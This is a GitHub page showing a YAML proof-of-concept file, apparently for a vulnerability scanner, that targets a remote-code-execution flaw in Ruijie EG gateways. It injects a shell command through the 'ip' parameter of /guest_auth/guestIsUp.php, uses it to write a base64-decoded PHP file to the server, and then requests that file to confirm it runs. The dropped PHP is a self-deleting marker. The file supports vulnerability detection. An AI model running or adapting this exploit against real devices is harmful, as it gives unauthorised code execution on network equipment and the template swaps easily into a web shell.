forked from coolboy0816/pxplan
-
Notifications
You must be signed in to change notification settings - Fork 0
/
ruijie-eg-guestisup-ip-rce.yml
executable file
·39 lines (39 loc) · 1.27 KB
/
ruijie-eg-guestisup-ip-rce.yml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
name: poc-yaml-ruijie-eg-rce
binding: 447835b7-74c2-48ec-a90c-439d5a9866c9
manual: true
detail:
author: White(https://github.com/WhiteHSBG)
links:
- https://xz.aliyun.com/t/9016?page=1
vulnerability:
id: CT-158830
level: critical
warning: 该脚本会上传文件产生一个临时的无害文件,同时能够执行自删除逻辑,但是可能删除不成功
transport: http
set:
r1: randomLowercase(8)
r2: randomLowercase(8)
phpcode: |
"<?php echo '" + r1 + "'; unlink(__FILE__); ?>"
payload: base64(phpcode)
rules:
r0:
request:
cache: true
method: POST
path: /guest_auth/guestIsUp.php
headers:
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
body: |
ip=127.0.0.1|echo '{{payload}}' | base64 -d > {{r2}}.php&mac=00-00
expression: response.status == 200
r1:
request:
cache: true
method: GET
path: /guest_auth/{{r2}}.php
headers:
Accept-Encoding: gzip, deflate
expression: response.body.bcontains(bytes(r1))
expression: r0() && r1()